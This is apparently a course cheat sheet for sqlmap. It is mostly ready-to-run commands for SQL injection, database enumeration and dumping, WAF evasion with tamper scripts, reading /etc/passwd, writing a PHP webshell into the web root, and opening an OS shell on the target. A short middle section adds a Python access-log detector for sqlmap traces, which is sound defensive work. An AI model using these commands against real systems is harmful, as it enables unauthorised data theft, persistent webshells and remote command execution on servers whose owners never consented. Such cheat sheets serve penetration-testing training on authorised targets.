
SQLMap Essentials

SQLMap from the CWES path: GET/POST/cookie/header injection, enumeration and dumping, request files, CSRF handling, WAF bypass with tamper scripts, file read/write, and --os-shell. Each command is listed on its own.

Basic scan

Auto-detect on a GET parameter:

sqlmap -u "http://IP/case1.php?id=1"

POST request (mark the injectable parameter in --data with *):

sqlmap -u "http://www.example.com/" --data 'uid=1*&name=test'

Load a saved Burp request file:

sqlmap -r req.txt

Add a session cookie:

sqlmap -r req.txt --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'

Inject via a cookie value:

sqlmap -u "http://TARGET/page" --cookie="session=abc123" -p session

Inject via a custom header:

sqlmap -u "http://TARGET/page" -H "X-Forwarded-For: *"

Enumeration

Banner, current user/DB, DBA status:

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

List databases:

sqlmap -u "http://TARGET/page?id=1" --dbs

List tables in a database:

sqlmap -u "http://IP/case1.php?id=1" --tables -D testdb

Dump a table:

sqlmap -u "http://IP/case1.php?id=1" --dump -T users -D testdb

Dump specific columns:

sqlmap -u "http://IP/case1.php?id=1" --dump -T users -D testdb -C name,surname

Dump everything except system DBs:

sqlmap -r req.txt --dump-all --exclude-sysdbs

Search for a column whose name contains 'pass':

sqlmap -u "http://www.example.com/?id=1" --search -C pass

CSRF & WAF bypass

Anti-CSRF token (sqlmap fetches a fresh token before each request):

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=XXXXX" --csrf-token="csrf-token"

Skip WAF detection + random agent:

sqlmap -u "..." --skip-waf --random-agent

Tamper scripts to obfuscate payloads:

sqlmap -r req.txt --tamper=space2comment,randomcase

Chunked encoding bypass:

sqlmap -r req.txt --chunked

Maximum thoroughness (more payloads and tests, noticeably slower):

sqlmap -u "http://TARGET/page?id=1" --level=5 --risk=3
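Added defender-side example, not part of the original cheat sheet: a small Python checker that scans web-server access logs for the traces the options in this section leave behind. It flags the default sqlmap User-Agent (which --random-agent removes, so that signal alone is weak), the /**/ sequences that the space2comment tamper script substitutes for spaces, and SQL keywords matched case-insensitively so that randomcase gains nothing. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Case-insensitive matching, so the randomcase tamper script does not evade it.
SQL_KEYWORDS = re.compile(
    r"(union\s+(all\s+)?select|\b(and|or)\s+\d+\s*=\s*\d+|sleep\s*\(|benchmark\s*\(|information_schema)",
    re.I,
)

# Constructed sample lines (not real traffic): one probe with the default sqlmap User-Agent,
# one obfuscated with space2comment + randomcase and sent behind --random-agent.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /case1.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /case1.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /case1.php?id=1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsElEcT%2F%2A%2A%2F1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /case1.php?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def flag_line(line: str) -> list:
    """Return the detection reasons for one access-log line (empty if clean or unparseable)."""
    m = LOG_RE.match(line.strip())
    if not m:
        return []
    reasons = []
    # The default UA is only present when --random-agent is NOT used: a weak signal on its own.
    if m["ua"].lower().startswith("sqlmap/"):
        reasons.append("default-sqlmap-user-agent")
    decoded = unquote_plus(unquote_plus(m["path"]))  # decode twice to normalise double encoding
    if "/**/" in decoded:  # signature of the space2comment tamper script
        reasons.append("space2comment-tamper")
    if SQL_KEYWORDS.search(decoded.replace("/**/", " ")):
        reasons.append("sql-keyword-in-request")
    return reasons


def analyze_log(text: str) -> dict:
    """Map each client IP that tripped a rule to its sorted, de-duplicated reasons."""
    hits = {}
    for line in text.splitlines():
        reasons = flag_line(line)
        if reasons:
            ip = LOG_RE.match(line.strip())["ip"]
            hits.setdefault(ip, set()).update(reasons)
    return {ip: sorted(r) for ip, r in hits.items()}
```

Run analyze_log over a real access log to get a per-client summary; the User-Agent rule is the first to disappear once --random-agent is in play, so treat the payload-based rules as the durable ones.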

File access & RCE

Read a server file:

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Write a webshell:

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

Interactive OS shell:

sqlmap -u "http://www.example.com/?id=1" --os-shell

Force the error-based technique when --os-shell fails with the automatically chosen one:

sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E

Comprehensive dump template

sqlmap -r req.txt --dump --batch --technique=BEUSTQ -D <db> -T <table> --tamper=space2comment --no-cast --time-sec=3